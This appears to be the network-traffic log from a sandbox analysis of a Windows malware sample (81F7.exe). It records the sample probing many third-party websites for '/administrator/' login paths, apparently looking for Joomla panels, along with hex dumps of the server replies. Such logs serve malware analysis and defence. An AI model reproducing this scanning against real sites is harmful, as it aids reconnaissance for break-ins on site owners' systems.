Feb 21, 2024 00:26:06.748778105 CET	185	OUT	GET /administrator/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.911370039 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	52345	178.33.253.225	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.755280972 CET	171	OUT	GET /administrator/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.922888041 CET	360	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cfca.eu/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:06.925139904 CET	180	OUT	GET /administrator/index.php HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.102943897 CET	369	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cfca.eu/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	52347	91.195.240.135	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.811275005 CET	179	OUT	GET /administrator/ HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.988020897 CET	346	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:06 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/administrator/ server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:06.991091967 CET	188	OUT	GET /administrator/index.php HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.473392010 CET	188	OUT	GET /administrator/index.php HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.567486048 CET	346	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:06 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/administrator/ server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:07.650424957 CET	355	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:07 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/administrator/index.php server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	52343	81.169.145.86	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.811271906 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.990483999 CET	465	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/administrator/ Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:06.991211891 CET	189	OUT	GET /administrator/index.php HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.170461893 CET	483	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:07 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/administrator/index.php Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	52337	85.13.138.112	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.811358929 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.993633032 CET	439	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Location: https://popular.de/administrator/ Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:06.996306896 CET	183	OUT	GET /administrator/index.php HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.178428888 CET	457	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:07 GMT Server: Apache Location: https://popular.de/administrator/index.php Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	53807	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.006624937 CET	232	OUT	GET /administrator/index.php HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://collevilca.it/administrator/
Feb 21, 2024 00:26:07.192575932 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Length: 13719 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:07.192604065 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:07.192687035 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
